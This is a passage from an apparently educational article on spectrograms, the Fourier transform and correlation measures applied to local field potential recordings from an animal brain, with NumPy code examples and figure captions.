<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-22.png" alt="" class="wp-image-1213" width="559" height="244" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-22.png 993w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-300x131.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-768x336.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-920x402.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-230x101.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-350x153.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-22-480x210.png 480w" sizes="(max-width: 559px) 100vw, 559px" /><figcaption><br>Fig 6: Time-Frequency Trade-off</figcaption></figure></div>
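<p>The trade-off can be quantified with simple arithmetic: a window of N samples at sampling rate f<sub>s</sub> spans Δt = N/f<sub>s</sub> seconds and gives DFT bins spaced Δf = f<sub>s</sub>/N apart, so Δt·Δf = 1 whichever N is chosen. The sketch below tabulates this for an assumed sampling rate of 1000 Hz and a few illustrative window lengths.</p>

```python
fs = 1000                                    # assumed sampling rate (Hz); Nyquist = 500 Hz
rows = []
for N in (50, 200, 1000):                    # candidate window lengths in samples
    dt = N / fs                              # duration of one window (s): time resolution
    df = fs / N                              # spacing of DFT bins (Hz): frequency resolution
    n_bins = N // 2 + 1                      # one-sided bins from 0 Hz up to Nyquist
    rows.append((N, dt, df, n_bins))
    print(f"N={N:5d}  dt={dt:.3f} s  df={df:6.2f} Hz  bins={n_bins:4d}  dt*df={dt * df:.1f}")
```

<p>Improving one resolution by a factor of ten worsens the other by the same factor; window tapering and overlapping segments change the details but not this basic limit.</p>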



<p>Depending on the length of the window, we can have two types of spectrograms: the narrowband spectrogram and the wideband spectrogram.</p>



<h4 class="wp-block-heading">3.2 Narrowband Spectrogram</h4>



<p>A narrowband spectrogram uses a long window. Each DFT is then computed from more points, which gives finer frequency resolution. The drawback is poorer time resolution, because each DFT spans a long stretch of time. As shown in the figure below, the frequency lines are very sharp, indicating exactly where these frequencies lie, but the timing of events is blurred.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-23.png" alt="" class="wp-image-1214" width="384" height="507" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-23.png 663w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-227x300.png 227w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-230x304.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-350x462.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-23-480x633.png 480w" sizes="(max-width: 384px) 100vw, 384px" /><figcaption><br>Fig 7: Narrowband spectrogram where the frequency resolution is very precise, but the time resolution is less accurate.</figcaption></figure></div>



<h4 class="wp-block-heading">3.3 Wideband Spectrogram</h4>



<p>A wideband spectrogram uses a short window. There are then many short time segments, which localize transitions precisely, i.e. the time resolution is high. However, because the window is short, each DFT has fewer points, which results in poor frequency resolution. In Fig. 8, we can see that the time boundaries are very sharp but the frequency lines are vague, and it is harder to identify the precise frequencies of the signal.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-24-1024x674.png" alt="" class="wp-image-1215" width="542" height="356" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-1024x674.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-300x197.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-768x505.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-920x605.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-350x230.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24-480x316.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-24.png 1049w" sizes="(max-width: 542px) 100vw, 542px" /><figcaption><br>Fig 8: Wideband spectrogram where we can see exactly where the time events happen, but the frequency resolution is less accurate and frequency lines are blurry</figcaption></figure></div>
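<p>The practical difference between narrowband and wideband analysis shows up clearly with two tones only 6 Hz apart. In this NumPy sketch (the tone frequencies, sampling rate and window lengths are assumptions chosen for clean numbers, and a rectangular window is used for simplicity), a long 0.5 s window has 2 Hz bins and separates the tones, while a short 0.05 s window has 20 Hz bins and cannot.</p>

```python
import numpy as np

fs = 1000                                          # assumed sampling rate (Hz)
t = np.arange(fs) / fs                             # 1 second of samples
x = np.cos(2 * np.pi * 50 * t) + np.cos(2 * np.pi * 56 * t)   # two tones 6 Hz apart

def magnitude_spectrum(segment):
    """Return bin frequencies (Hz) and |DFT| of one segment (rectangular window)."""
    freqs = np.fft.rfftfreq(len(segment), d=1 / fs)
    return freqs, np.abs(np.fft.rfft(segment))

# Narrowband: long window (500 samples, 2 Hz bins). Each tone lands on its own bin,
# and the bins between them (52 Hz and 54 Hz) are essentially empty.
f_long, m_long = magnitude_spectrum(x[:500])
print(f_long[[25, 26, 27, 28]], m_long[[25, 26, 27, 28]].round(6))

# Wideband: short window (50 samples, 20 Hz bins). The nearest bins are 40 Hz and 60 Hz,
# so the two tones merge into a single broad peak.
f_short, m_short = magnitude_spectrum(x[:50])
print(f_short[1:5], m_short[1:5].round(2))
```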



<h4 class="wp-block-heading">3.4 Neural Data Analysis of Brain Signal</h4>



<p>From this point forward, all the graphs and pictures have been derived from actual brain data. This data is the LFP signal from the brain of an animal when subjected to certain testing conditions.</p>



<h4 class="wp-block-heading">3.5 Local Field Potential</h4>



<p>The local field potential is the electric potential recorded in the extracellular space around neurons, typically using micro-needles. It differs from the electroencephalogram (EEG), which is recorded at the surface of the scalp with macro-electrodes.</p>



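<p>When messages are transmitted from one neuron to another, the sending neuron fires a brief spike in membrane potential known as an action potential, which in turn triggers synaptic currents in the receiving neurons. The electrode picks up this activity; in practice, the LFP mainly reflects its low-frequency part, dominated by the summed synaptic currents of the neurons near the electrode, while the fast action potentials are usually filtered out and analysed separately. Because they are recorded in such close proximity to the neurons, LFP signals are far more local than the EEG, whose signal must propagate through various media such as the cranium, the cerebrospinal fluid, the dura mater, muscle and skin.</p>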



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-25.png" alt="" class="wp-image-1216" width="490" height="338" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-25.png 834w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-300x207.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-768x530.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-230x159.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-350x242.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-25-480x332.png 480w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption><br>Fig.9:  Neural data taken from the same electrode: two different trials of the same experiment</figcaption></figure></div>



<p>The LFP data shown in Fig. 9 are two trials of a particular experiment, both recorded by the same electrode. In the dataset, each signal corresponds to the data collected by a single electrode; the probes were placed at different locations but recorded during the same period of time. The signals from all five trials are shown together in Fig. 10.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-26.png" alt="" class="wp-image-1217" width="500" height="324" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-26.png 828w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-300x194.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-768x497.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-230x149.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-350x227.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-26-480x311.png 480w" sizes="(max-width: 500px) 100vw, 500px" /><figcaption><br>Fig.10: LFP data of five trials.</figcaption></figure></div>



<p>The mean of all these trials is then used to compute the spectrogram. Fig. 11 shows the mean of the signals across the five trials.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-27.png" alt="" class="wp-image-1218" width="497" height="351" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-27.png 804w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-300x212.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-768x543.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-230x162.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-350x247.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-27-480x339.png 480w" sizes="(max-width: 497px) 100vw, 497px" /><figcaption><br>Fig 11: Graph showing the mean LFP of different trials of an experiment</figcaption></figure></div>
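<p>Averaging across trials is a single NumPy call once the recordings are stored as a trials × samples array. The data below are synthetic (a hypothetical shared 8 Hz component plus independent noise in each of five trials); the array layout, sampling rate and noise level are assumptions, not the recordings shown in the figures. Because the noise differs from trial to trial while the shared response does not, the mean typically tracks the shared component more closely than any single trial, with the noise shrinking roughly by a factor of √5.</p>

```python
import numpy as np

rng = np.random.default_rng(42)
fs, n_trials = 1000, 5                         # assumed sampling rate (Hz) and number of trials
t = np.arange(fs) / fs                         # 1 second per trial
common = np.sin(2 * np.pi * 8 * t)             # hypothetical response shared by all trials
trials = common + rng.normal(scale=1.0, size=(n_trials, t.size))   # rows = trials

mean_lfp = trials.mean(axis=0)                 # average across trials, sample by sample

def rms_error(signal):
    """Root-mean-square deviation of a signal from the shared component."""
    return np.sqrt(np.mean((signal - common) ** 2))

print([round(rms_error(tr), 2) for tr in trials])   # each single trial: about 1.0
print(round(rms_error(mean_lfp), 2))                # trial average: about 1/sqrt(5), i.e. 0.45
```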



<p>Fig. 11 shows how the mean LFP varies with time. As we can see, the y-axis has both negative and positive voltages. Starting at 0 seconds, the signal rises sharply from a value of -4 to a positive value of 2 and then keeps varying.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-28.png" alt="" class="wp-image-1219" width="570" height="365" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-28.png 842w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-300x192.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-768x493.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-230x148.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-350x224.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-28-480x308.png 480w" sizes="(max-width: 570px) 100vw, 570px" /><figcaption><br>Fig 12: This figure shows the DFT of the LFP signal shown in Fig. 10</figcaption></figure></div>



<p>The graph in Fig. 12 shows the DFT of the signal depicted in Fig. 11. The positive-frequency half of the graph is a mirror image of the negative-frequency half. This is because the LFP is a real-valued signal: the DFT of a real signal is conjugate-symmetric, so each negative-frequency component has exactly the same magnitude as the corresponding positive-frequency one.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-29.png" alt="" class="wp-image-1220" width="478" height="303" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-29.png 879w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-300x190.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-768x488.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-230x146.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-350x222.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-29-480x305.png 480w" sizes="(max-width: 478px) 100vw, 478px" /><figcaption><br>Fig 13: The expanded view of the DFT of Fig. 12  after eliminating the negative portion</figcaption></figure></div>



<p>Because the negative frequencies carry no additional information, they are discarded and the positive half is shown enlarged in Fig. 13. The graph is now more readable, and the individual frequency components can be distinguished.</p>
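<p>Both the mirror symmetry and the removal of negative frequencies can be checked with NumPy. For any real signal, X[N-k] is the complex conjugate of X[k], so <code>numpy.fft.rfft</code> returns only the non-negative half; doubling the power in the interior bins of that half preserves the total power. The random test signal is an assumption for illustration, and an even length is assumed so that there is a single Nyquist bin.</p>

```python
import numpy as np

rng = np.random.default_rng(7)
x = rng.standard_normal(256)                  # arbitrary real-valued signal, even length N
N = len(x)

X = np.fft.fft(x)                             # full two-sided spectrum
k = np.arange(1, N)
symmetric = np.allclose(X[N - k], np.conj(X[k]))   # negative half mirrors the positive half

X_pos = np.fft.rfft(x)                        # bins 0 .. N/2 only
power_pos = np.abs(X_pos) ** 2
power_pos[1:-1] *= 2                          # fold negative-frequency power onto positive bins
same_power = np.isclose(power_pos.sum(), (np.abs(X) ** 2).sum())

print(symmetric, same_power)                  # True True
```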



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-30.png" alt="" class="wp-image-1221" width="483" height="316" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-30.png 806w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-300x197.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-768x503.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-230x151.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-350x229.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-30-480x314.png 480w" sizes="(max-width: 483px) 100vw, 483px" /><figcaption><br>Fig.14:  Spectrogram of the LFP data</figcaption></figure></div>



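<p>The spectrogram of the LFP data is shown in Fig. 14. In a spectrogram, time runs along the horizontal axis and frequency along the vertical axis, while the color of each point encodes the signal power at that time and frequency: purple indicates low power, whereas blue, green and yellow indicate progressively higher power.</p>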
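<p>A spectrogram is built from short-time Fourier transforms: the signal is cut into overlapping windows, and the power spectrum of each window becomes one column of the image. The sketch below is a minimal NumPy version assuming a Hann window of 100 samples and a hop of 50 samples; the helper name <code>spectrogram</code> and the 10 Hz / 40 Hz test signal are hypothetical, and SciPy's <code>scipy.signal.spectrogram</code> offers a full-featured equivalent.</p>

```python
import numpy as np

fs = 200                              # sampling rate in Hz (assumed)
t = np.arange(2 * fs) / fs            # 2 seconds of samples
# Hypothetical signal: 10 Hz for the first second, 40 Hz for the second.
x = np.where(t < 1.0, np.sin(2 * np.pi * 10 * t), np.sin(2 * np.pi * 40 * t))

def spectrogram(x, fs, win_len=100, hop=50):
    """Short-time power spectrum: rows = frequencies, columns = time windows."""
    window = np.hanning(win_len)
    starts = range(0, len(x) - win_len + 1, hop)
    frames = np.array([x[s:s + win_len] * window for s in starts])
    power = np.abs(np.fft.rfft(frames, axis=1)) ** 2   # power per window and frequency bin
    freqs = np.fft.rfftfreq(win_len, d=1 / fs)
    times = np.array([(s + win_len / 2) / fs for s in starts])  # window centres in seconds
    return freqs, times, power.T

freqs, times, S = spectrogram(x, fs)
# A spectrogram plot colors the entries of S; here we just read off
# the frequency with the most power in each time window.
dominant = freqs[np.argmax(S, axis=0)]
print(times)
print(dominant)
```

<p>The first three windows peak at 10 Hz and the last three at 40 Hz, while the window centred on t = 1 s straddles the switch and mixes both tones.</p>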



<h4 class="wp-block-heading">3.6 Correlation Function</h4>



<p>The correlation function is a useful tool for comparing two signals that vary with time. It measures how similar the two signals are as a function of the time shift (lag) applied to one of them. There are two types: cross-correlation and autocorrelation.</p>



<h4 class="wp-block-heading">3.7 Cross-Correlation</h4>



<p>Cross-correlation is the correlation between one signal and a time-shifted version of another signal. It is also known as the sliding dot product or sliding inner product. Consider two signals x(t) and y(t) that are functions of time. Their cross-correlation function can be written as:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM.png" alt="" class="wp-image-1222" width="391" height="120" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM.png 654w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-300x92.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-230x70.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-350x107.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.35.05-PM-480x147.png 480w" sizes="(max-width: 391px) 100vw, 391px" /></figure>



<p>Where s is the shift in time.</p>
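<p>The formula image is not reproduced in the text, so this sketch assumes the common discrete form R<sub>xy</sub>(s) = Σ<sub>t</sub> x(t) y(t + s), summed over the overlapping samples of two mean-centred signals. The helper <code>cross_correlation</code> and the random test signals are hypothetical: y is x delayed by 3 samples, so the cross-correlation should peak at a shift of s = 3.</p>

```python
import numpy as np

def cross_correlation(x, y, max_lag):
    """Return lags s and R_xy(s) = sum_t x[t] * y[t + s] for s in [-max_lag, max_lag].

    Both signals are mean-centred first; only overlapping samples are summed.
    """
    x = np.asarray(x, dtype=float) - np.mean(x)
    y = np.asarray(y, dtype=float) - np.mean(y)
    n = len(x)
    lags = np.arange(-max_lag, max_lag + 1)
    r = []
    for s in lags:
        if s >= 0:
            r.append(np.dot(x[:n - s], y[s:]))     # pairs x[t] with y[t + s]
        else:
            r.append(np.dot(x[-s:], y[:n + s]))    # same pairing, t starts at -s
    return lags, np.array(r)

rng = np.random.default_rng(0)
x = rng.standard_normal(500)
y = np.roll(x, 3)          # y is x delayed by 3 samples: y[t] = x[t - 3]

lags, r = cross_correlation(x, y, max_lag=10)
print(lags[np.argmax(r)])  # 3
```

<p>Because the signals are random noise, the correlation is large only at the shift that realigns them; for real LFP recordings the peak is usually broader and smaller.</p>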



<h4 class="wp-block-heading">3.8 Autocorrelation</h4>



<p>Autocorrelation, also known as serial correlation, is the correlation of a signal with a delayed version of itself. In other words, it measures how similar the signal is to itself as a function of the time lag between observations, which makes it useful for finding repeating patterns in functions or series of values. Using the same signals as above, the autocorrelation functions can be written as:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM.png" alt="" class="wp-image-1224" width="395" height="110" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM.png 752w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-300x84.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-230x64.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-350x98.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.04-PM-480x134.png 480w" sizes="(max-width: 395px) 100vw, 395px" /></figure>
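<p>As a minimal sketch of the idea (not necessarily the exact normalisation in the formula image), the hypothetical helper below averages x(t)·x(t + s) over the overlapping samples and divides by the value at s = 0. For a hypothetical sine wave with a period of 20 samples, the autocorrelation returns to its maximum at a lag of 20 and reaches -1 at half a period.</p>

```python
import numpy as np

def autocorrelation(x, max_lag):
    """Normalised autocorrelation r(s) for s = 0..max_lag.

    Each lag is the mean of x[t] * x[t + s] over the overlapping samples,
    divided by the lag-0 value so that r(0) = 1.
    """
    x = np.asarray(x, dtype=float) - np.mean(x)
    n = len(x)
    r = np.array([np.mean(x[:n - s] * x[s:]) for s in range(max_lag + 1)])
    return r / r[0]

# Hypothetical periodic signal with a period of 20 samples.
t = np.arange(200)
x = np.sin(2 * np.pi * t / 20)

r = autocorrelation(x, max_lag=30)
print(np.argmax(r[1:]) + 1)   # 20: the signal repeats every 20 samples
print(round(r[10], 2))        # -1.0: half a period out of phase
```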



<h4 class="wp-block-heading">3.9 Covariance</h4>



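<p>Covariance measures how two variables vary together. It summarizes their joint variability in a single number: a positive value means the variables tend to increase together, while a negative value means one tends to decrease as the other increases. Because its magnitude depends on the units of the data, covariance shows the direction of a linear relationship rather than its strength. It is given by eqn (x).</p>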



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM.png" alt="" class="wp-image-1226" width="484" height="207" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM.png 700w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-300x129.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-230x99.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-350x150.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.12-PM-480x206.png 480w" sizes="(max-width: 484px) 100vw, 484px" /></figure>



<p>where x<sub>i</sub> and y<sub>i</sub> are the data values of x and y respectively, x̄ and ȳ are their mean values, and N is the number of data values.</p>
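<p>The covariance formula can be written directly in NumPy. This sketch assumes the formula divides by N, as the definitions above suggest; <code>np.cov(x, y, bias=True)</code> uses the same convention, while the default <code>np.cov(x, y)</code> divides by N - 1 (the sample covariance). The helper name and the small data set are hypothetical.</p>

```python
import numpy as np

def covariance(x, y):
    """Covariance as the mean of (x_i - x_mean) * (y_i - y_mean) over N values."""
    x = np.asarray(x, dtype=float)
    y = np.asarray(y, dtype=float)
    return np.sum((x - x.mean()) * (y - y.mean())) / len(x)

x = [1.0, 2.0, 3.0, 4.0]
y = [2.0, 4.0, 6.0, 8.0]   # y = 2x, so the covariance is positive
print(covariance(x, y))    # 2.5
```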



<h4 class="wp-block-heading">3.10 Pearson Correlation</h4>



<p>Another way to quantify correlation is the Pearson correlation coefficient, a measure of linear correlation between two sets of data. It is the covariance of the two variables divided by the product of their standard deviations, so it always lies between -1 and +1. As with covariance, it reflects only linear correlation and cannot capture other types of relationship.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM.png" alt="" class="wp-image-1225" width="487" height="184" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM.png 682w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-300x113.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-230x87.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-350x132.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.29-PM-480x182.png 480w" sizes="(max-width: 487px) 100vw, 487px" /></figure>



<p>Eqn. (xi) gives the formula for the Pearson coefficient. Computing it for every pair of variables gives the correlation matrix:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM.png" alt="" class="wp-image-1223" width="472" height="137" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM.png 676w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-300x87.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-230x67.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-350x101.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.37.36-PM-480x139.png 480w" sizes="(max-width: 472px) 100vw, 472px" /></figure>
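<p>The Pearson coefficient and the correlation matrix can be sketched as below, with one row of <code>data</code> per variable (for example, one electrode). The helpers and the random test data are hypothetical; NumPy's <code>np.corrcoef</code> computes the same matrix. Whatever the data, the diagonal is 1 and the matrix is symmetric.</p>

```python
import numpy as np

def pearson(x, y):
    """Pearson coefficient: covariance divided by the product of standard deviations."""
    x = np.asarray(x, dtype=float)
    y = np.asarray(y, dtype=float)
    dx, dy = x - x.mean(), y - y.mean()
    return np.sum(dx * dy) / np.sqrt(np.sum(dx ** 2) * np.sum(dy ** 2))

def correlation_matrix(data):
    """data has one row per variable; entry [i, j] is pearson(row i, row j)."""
    n = data.shape[0]
    return np.array([[pearson(data[i], data[j]) for j in range(n)] for i in range(n)])

# Hypothetical data: 3 variables with 1000 samples each.
rng = np.random.default_rng(1)
a = rng.standard_normal(1000)
data = np.vstack([
    a,                                      # variable 0
    a + 0.1 * rng.standard_normal(1000),    # variable 1: almost a copy of variable 0
    rng.standard_normal(1000),              # variable 2: unrelated noise
])

C = correlation_matrix(data)
print(np.round(C, 2))
```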



<h4 class="wp-block-heading">3.11 Correlation Of Neural Data</h4>



<p>To calculate the correlation, we consider two LFP signals recorded by two different electrodes, shown in two distinct colors in Fig. 15. The plot shows how each signal changes with time and how similar the two signals are.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-31.png" alt="" class="wp-image-1227" width="435" height="284" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-31.png 780w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-300x196.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-768x502.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-230x150.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-350x229.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-31-480x314.png 480w" sizes="(max-width: 435px) 100vw, 435px" /><figcaption><br>Fig 15: LFP data taken into consideration for calculation of correlation</figcaption></figure></div>



<p>We now calculate the correlation among the LFP signals recorded by 5 electrodes at different brain locations, which gives the correlation matrix in Fig. 16. For simplicity, we restricted the computation of the correlation matrix to these 5 electrodes.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-32-1024x217.png" alt="" class="wp-image-1228" width="536" height="114" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-1024x217.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-300x64.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-768x163.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-920x195.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-230x49.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-350x74.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32-480x102.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-32.png 1108w" sizes="(max-width: 536px) 100vw, 536px" /><figcaption><br>Fig.16: Correlation matrix for LFP data</figcaption></figure></div>



<p>Note that the diagonal elements of the matrix are all 1, since each is the correlation of a column with itself. The matrix is also symmetric, because the Pearson coefficient of x with y equals that of y with x.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-33.png" alt="" class="wp-image-1229" width="443" height="316" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-33.png 707w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-300x214.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-230x164.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-350x250.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-33-480x342.png 480w" sizes="(max-width: 443px) 100vw, 443px" /><figcaption><br>Fig.17: Correlation plot for LFP data corresponding to 5 data points</figcaption></figure></div>



<p>Fig. 17 shows the plot corresponding to the correlation matrix in Fig. 16. The diagonal elements are shaded white, indicating high correlation, as expected since they are all equal to one. Conversely, the elements shaded black have correlation close to zero. Using the heat map as a reference, we can identify which pairs of electrodes are highly correlated and which are not.</p>
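<p>Reading the heat map amounts to scanning the off-diagonal entries, since the diagonal is always 1. A minimal sketch, with a hypothetical helper <code>extreme_pairs</code> and a made-up 3 × 3 matrix chosen only to mirror the pattern discussed in the text (it is not the data in Fig. 16), picks the most and least strongly correlated pairs by absolute value.</p>

```python
import numpy as np

def extreme_pairs(C):
    """Return the off-diagonal pairs (i, j), i before j, with the highest and lowest |correlation|."""
    n = C.shape[0]
    pairs = [(i, j) for i in range(n) for j in range(i + 1, n)]   # upper triangle only
    strengths = [abs(C[i, j]) for i, j in pairs]
    best = pairs[int(np.argmax(strengths))]
    worst = pairs[int(np.argmin(strengths))]
    return best, worst

# Hypothetical 3 x 3 correlation matrix (not the values from Fig. 16).
C = np.array([[1.00, 0.12, 0.85],
              [0.12, 1.00, 0.30],
              [0.85, 0.30, 1.00]])
best, worst = extreme_pairs(C)
print(best, worst)   # (0, 2) (0, 1)
```

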